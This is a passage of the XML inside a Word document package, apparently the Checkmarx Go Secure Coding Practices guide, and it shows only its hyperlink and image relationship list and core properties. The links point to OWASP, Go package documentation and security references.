      <w:shd w:color="auto" w:fill="E7E7E7" w:val="clea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hyperlink" Target="http://nginx.org/en/docs/http/ngx_http_log_module.html#log_format" Id="rId69" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/math/rand/#pkg-overview" Id="rId81" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/go-playground/validator" Id="rId51" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#DecodeLastRuneInString" Id="rId47" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/petervanderdoes/gitflow-avh/wiki/Installation" Id="rId129" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Validation_Regex_Repository" Id="rId52" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/log/" Id="rId84" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Least_privilege" Id="rId94" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.docker.com/" Id="rId133" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/crypto/" Id="rId77" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com" Id="rId120" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swtch.com/~rsc/regexp/regexp1.html" Id="rId111" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/crypto/blake2b" Id="rId75" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/crypto" Id="rId79" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#ValidRune" Id="rId43" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/crypto/rand/" Id="rId83" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GitbookIO/gitbook-cli#how-to-install-it" Id="rId131" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/safe.png" Id="rId19"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion" Id="rId67" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/plugin/" Id="rId103" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p-h-c/phc-winner-argon2" Id="rId72" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.checkmarx.com/2018/05/07/redos-go/" Id="rId114" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Synchronizer_.28CSRF.29_Tokens" Id="rId110" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#Valid" Id="rId42" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/downloads" Id="rId128" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/database/sql/" Id="rId96" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Checkmarx/Go-SCP" Id="rId119" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#DecodeRuneInString" Id="rId48" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/w1_1.png" Id="rId14"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvie.com/posts/a-successful-git-branching-model" Id="rId123" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mattn/go-sqlite3" Id="rId98" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/net/http/#Request" Id="rId91" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/xss.png" Id="rId7"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/html-template-plain-text.png" Id="rId9"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/crypto/blake2s" Id="rId76" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/wss_secure.png" Id="rId17"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#ValidString" Id="rId44" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blake2.net/" Id="rId74" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dlclark" Id="rId118" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/context/" Id="rId101" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/net/http/#ServeMux.Handler" Id="rId56" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maxwells/sanitize" Id="rId54" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.github.com/articles/about-pull-requests" Id="rId132" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/regexp/" Id="rId40" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/crypto/pbkdf2" Id="rId73" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-Top_10" Id="rId32" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strconv/#ParseInt" Id="rId36" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-A1-Injection" Id="rId31" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" Id="rId137" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/re2/wiki" Id="rId112" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_Directory_Indexingi" Id="rId92" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strconv/#ParseBool" Id="rId34" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/safe2.png" Id="rId20"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf" Id="rId30" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GitbookIO/gitbook-cli" Id="rId127" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org" Id="rId23" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jaspernbrouwer/git-flow-hooks" Id="rId124" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gorillatoolkit.org/pkg/mux" Id="rId58" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/About_OWASP" Id="rId29" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ws_tls_upgrade.png" Id="rId16"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.twitter.com/checkmarx" Id="rId27" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/math/rand/" Id="rId80" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/math/rand/#Seed" Id="rId82" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.ietf.org/html/rfc7507" Id="rId89" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" Id="rId70" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chkmrx.co/2sffXFr" Id="rId24" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide" Id="rId25" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/crypto/bcrypt" Id="rId71" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.regular-expressions.info/backref.html" Id="rId116" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://strongpasswordgenerator.com/" Id="rId102" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/InsecureHeader.png" Id="rId13"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foo.com" Id="rId106" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crypto.stanford.edu/cs155old/cs155-spring14/lectures/09-web-site-sec.pdf" Id="rId90" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/en/" Id="rId134" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/5.7/en/mysql-secure-installation.html" Id="rId99" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/SessionManagementOverview.png" Id="rId11"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/go-sql-driver/mysql" Id="rId97" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://regexlib.com/REDetails.aspx?regexp_id=1757" Id="rId115" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/crypto/md5/" Id="rId78" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gorilla/" Id="rId49" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ssllabs.com/" Id="rId88" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/google/re2/wiki/WhyRE2" Id="rId113" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strconv/#ParseFloat" Id="rId35" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" Id="rId2"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/juju/loggo" Id="rId87" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/text-html.png" Id="rId6"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.regular-expressions.info/lookaround.html" Id="rId117" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/go-playground/form" Id="rId50" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gogs.io" Id="rId121" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" Id="rId28" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId3"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" Id="rId105" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/io/" Id="rId63" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kennygrant/sanitize" Id="rId53" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/w2_1.png" Id="rId15"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)" Id="rId60" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/headers_set_versions.jpeg" Id="rId21"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/text-template-xss.png" Id="rId8"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#EncodeRune" Id="rId45" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mimesniff.spec.whatwg.org/#rules-for-identifying-an-unknown-mime-typ" Id="rId64" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/database/sql/#DB.Prepare" Id="rId66" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/text-plain.png" Id="rId5"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/" Id="rId41" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/index_file.png" Id="rId18"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/unicode/utf8/#DecodeLastRune" Id="rId46" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cB52MA.jpeg" Id="rId12"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jaspernbrouwer" Id="rId125" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/text/template/" Id="rId65" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mariadb.com/kb/en/mariadb/mysql_secure_installation/" Id="rId100" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strings/#ToTitle" Id="rId39" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/golang/glog" Id="rId86" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jaspernbrouwer/git-flow-hooks#install" Id="rId130" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_nonce" Id="rId107" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://godoc.org/golang.org/x/net/webdav" Id="rId93" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Sirupsen/logrus" Id="rId85" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" Id="rId59" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gorilla/csrf" Id="rId109" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tour.golang.org/list" Id="rId26" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/html/template/" Id="rId61" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/html-template-text-plain-noxss.png" Id="rId10"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://calibre-ebook.com/download" Id="rId135" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cover.jpeg" Id="rId22"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.giac.org/paper/gsec/2693/implementation-methodology-information-security-management-system-to-comply-bs-7799-requi/104600)" Id="rId95" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId1"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" Id="rId136" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strings/#Trim" Id="rId37" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strconv/#Atoi" Id="rId33" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gorillatoolkit.org/" Id="rId108" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/golang/go/issues/13761" Id="rId104" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://httpd.apache.org/docs/1.3/logs.html#accesslog" Id="rId68" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ilyaglotov.com/blog/servemux-and-path-traversal" Id="rId57" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/strings/#ToLower" Id="rId38" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://golang.org/pkg/net/http/" Id="rId62" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/petervanderdoes/gitflow-avh" Id="rId122" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/microcosm-cc/bluemonday" Id="rId55" TargetMode="External"/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://daringfireball.net/projects/markdown" Id="rId126"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02.0075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2019-07-29T09:30:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-29T09:30:40Z</dcterms:modified>
  <dc:title>Table of Contents</dc:title>
  <dc:creator>Checkmarx Security Research Team</dc:creator>
  <dc:language>en</dc:language>
</cp:coreProperties>
</file>